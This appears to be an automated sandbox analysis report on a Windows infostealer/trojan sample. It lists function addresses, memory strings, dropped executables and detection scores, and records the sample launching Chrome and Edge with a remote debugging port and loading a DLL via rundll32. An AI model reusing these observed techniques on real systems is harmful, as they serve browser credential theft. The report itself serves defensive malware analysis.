Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C82AD50	0_2_6C82AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C796D90	0_2_6C796D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79EE70	0_2_6C79EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E0E20	0_2_6C7E0E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70AEC0	0_2_6C70AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A0EC0	0_2_6C7A0EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C786E90	0_2_6C786E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C2F70	0_2_6C7C2F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C848FB0	0_2_6C848FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76EF40	0_2_6C76EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C706F10	0_2_6C706F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DEFF0	0_2_6C7DEFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C700FE0	0_2_6C700FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C840F20	0_2_6C840F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70EFB0	0_2_6C70EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D4840	0_2_6C7D4840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C750820	0_2_6C750820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78A820	0_2_6C78A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8068E0	0_2_6C8068E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7EC8C0	0_2_6C7EC8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C738960	0_2_6C738960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81C9E0	0_2_6C81C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C756900	0_2_6C756900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7349F0	0_2_6C7349F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C09B0	0_2_6C7C09B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7909A0	0_2_6C7909A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BA9A0	0_2_6C7BA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77CA70	0_2_6C77CA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B8A30	0_2_6C7B8A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7AEA00	0_2_6C7AEA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77EA80	0_2_6C77EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C806BE0	0_2_6C806BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A0BA0	0_2_6C7A0BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C82A480	0_2_6C82A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C718460	0_2_6C718460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78A430	0_2_6C78A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C764420	0_2_6C764420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7464D0	0_2_6C7464D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79A4D0	0_2_6C79A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A0570	0_2_6C7A0570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C762560	0_2_6C762560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C758540	0_2_6C758540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78E5F0	0_2_6C78E5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CA5E0	0_2_6C7CA5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C804540	0_2_6C804540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C848550	0_2_6C848550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F45B0	0_2_6C6F45B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75C650	0_2_6C75C650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75E6E0	0_2_6C75E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79E6E0	0_2_6C79E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7246D0	0_2_6C7246D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C780700	0_2_6C780700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72A7D0	0_2_6C72A7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74E070	0_2_6C74E070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C8010	0_2_6C7C8010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CC000	0_2_6C7CC000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7100B0	0_2_6C7100B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DC0B0	0_2_6C7DC0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F8090	0_2_6C6F8090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C768140	0_2_6C768140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C776130	0_2_6C776130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E4130	0_2_6C7E4130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7001E0	0_2_6C7001E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C788260	0_2_6C788260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C798250	0_2_6C798250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8862C0	0_2_6C8862C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D8220	0_2_6C7D8220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CA210	0_2_6C7CA210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CE2B0	0_2_6C7CE2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D22A0	0_2_6C7D22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C702370	0_2_6C702370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C796370	0_2_6C796370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C708340	0_2_6C708340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C772320	0_2_6C772320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7543E0	0_2_6C7543E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75E3B0	0_2_6C75E3B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7323A0	0_2_6C7323A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81C360	0_2_6C81C360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C842370	0_2_6C842370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C703C40	0_2_6C703C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C711C30	0_2_6C711C30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C83DCD0	0_2_6C83DCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C1CE0	0_2_6C7C1CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C829C40	0_2_6C829C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79FC80	0_2_6C79FC80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C849D90	0_2_6C849D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C763D00	0_2_6C763D00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D1DC0	0_2_6C7D1DC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F3D80	0_2_6C6F3D80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80DE10	0_2_6C80DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C723EC0	0_2_6C723EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C885E60	0_2_6C885E60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85BE70	0_2_6C85BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81DFC0	0_2_6C81DFC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C883FC0	0_2_6C883FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C735F20	0_2_6C735F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F5F30	0_2_6C6F5F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7ABFF0	0_2_6C7ABFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C857F20	0_2_6C857F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C721F90	0_2_6C721F90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D3840	0_2_6C7D3840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75D810	0_2_6C75D810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85B8F0	0_2_6C85B8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DF8F0	0_2_6C7DF8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70D8E0	0_2_6C70D8E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7338E0	0_2_6C7338E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79F8C0	0_2_6C79F8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77F960	0_2_6C77F960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BD960	0_2_6C7BD960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B5920	0_2_6C7B5920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C84F900	0_2_6C84F900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7659F0	0_2_6C7659F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7979F0	0_2_6C7979F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7399D0	0_2_6C7399D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7999C0	0_2_6C7999C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D1990	0_2_6C7D1990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C711980	0_2_6C711980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FDA30	0_2_6C7FDA30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73FA10	0_2_6C73FA10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A1A10	0_2_6C7A1A10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C701AE0	0_2_6C701AE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DDAB0	0_2_6C7DDAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C889A50	0_2_6C889A50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DFB60	0_2_6C7DFB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74BB20	0_2_6C74BB20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C747BF0	0_2_6C747BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C9BB0	0_2_6C7C9BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C759BA0	0_2_6C759BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E5B90	0_2_6C7E5B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F1B80	0_2_6C6F1B80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8814A0	0_2_6C8814A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E9430	0_2_6C7E9430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78D410	0_2_6C78D410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7014E0	0_2_6C7014E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C715510	0_2_6C715510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C767500	0_2_6C767500
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7855F0	0_2_6C7855F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C84F510	0_2_6C84F510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C739590	0_2_6C739590
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C719650	0_2_6C719650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C755640	0_2_6C755640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C777610	0_2_6C777610
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C729600	0_2_6C729600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7316A0	0_2_6C7316A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7696A0	0_2_6C7696A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7ED740	0_2_6C7ED740
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8437C0	0_2_6C8437C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C723720	0_2_6C723720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D9720	0_2_6C7D9720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76D710	0_2_6C76D710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78B7A0	0_2_6C78B7A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C709050	0_2_6C709050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7AF050	0_2_6C7AF050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FD050	0_2_6C6FD050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74B020	0_2_6C74B020
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B7090	0_2_6C7B7090
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_005A7049	21_2_005A7049
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_005A8860	21_2_005A8860
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_005A78BB	21_2_005A78BB
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_00678101	21_2_00678101
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_005A31A8	21_2_005A31A8
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_00564B30	21_2_00564B30
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_005A2D10	21_2_005A2D10
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_00564DE0	21_2_00564DE0
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_00597F36	21_2_00597F36
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_005A779B	21_2_005A779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00B178BB	22_2_00B178BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00B18860	22_2_00B18860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00B17049	22_2_00B17049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00B131A8	22_2_00B131A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00AD4B30	22_2_00AD4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00AD4DE0	22_2_00AD4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00B12D10	22_2_00B12D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00B1779B	22_2_00B1779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00B07F36	22_2_00B07F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00ADE530	24_2_00ADE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00AF6192	24_2_00AF6192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00B18860	24_2_00B18860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00AD4B30	24_2_00AD4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00AD4DE0	24_2_00AD4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00B12D10	24_2_00B12D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00AF0E13	24_2_00AF0E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00B17049	24_2_00B17049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00B131A8	24_2_00B131A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00AF1602	24_2_00AF1602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00B1779B	24_2_00B1779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00B178BB	24_2_00B178BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00AF3DF1	24_2_00AF3DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00B07F36	24_2_00B07F36

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C729B10 appears 110 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C88D930 appears 72 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C723620 appears 98 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C8809D0 appears 356 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C88DAE0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C839F30 appears 53 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C75C5E0 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00AEDF80 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00AE80C0 appears 263 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00AED64E appears 66 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00AE7A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00B08E10 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00AED663 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00AED942 appears 85 times
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: String function: 005780C0 appears 130 times

Source: file.exe, 00000000.00000002.2445001444.000000006F8F2000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: vzzebkzr ZLIB complexity 0.9945674390196984
Source: random[1].exe.24.dr	Static PE information: Section: vzzebkzr ZLIB complexity 0.9945674390196984
Source: 9305c7ab92.exe.24.dr	Static PE information: Section: vzzebkzr ZLIB complexity 0.9945674390196984

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@123/418@80/32

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C760300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6C760300

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\EXZL3MRG.htm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8680:120:WilError_03

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

File created: C:\Users\user\AppData\Local\Temp\0ca23d0c-a252-4021-88fd-00a6e4b45040.tmp

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main

Source: softokn3[1].dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2432516145.000000001D109000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2443488067.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2432516145.000000001D109000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2443488067.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2432516145.000000001D109000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2443488067.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2432516145.000000001D109000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2443488067.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2432516145.000000001D109000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2443488067.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2432516145.000000001D109000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2443488067.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2432516145.000000001D109000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2443488067.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2184851875.000000001D005000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2274403438.000000001CFF9000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2904396350.0000000005AD4000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919405321.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2904840319.0000000005AB5000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919193839.0000000005BB3000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092194855.00000000058D7000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3116449473.00000000058FF000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3091391026.00000000058F6000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365343148.0000000005B7D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2432516145.000000001D109000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2443488067.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2432516145.000000001D109000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2443488067.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	Virustotal: Detection: 36%
Source: file.exe	ReversingLabs: Detection: 28%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2172,i,10839052718167675908,6568144357530153640,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
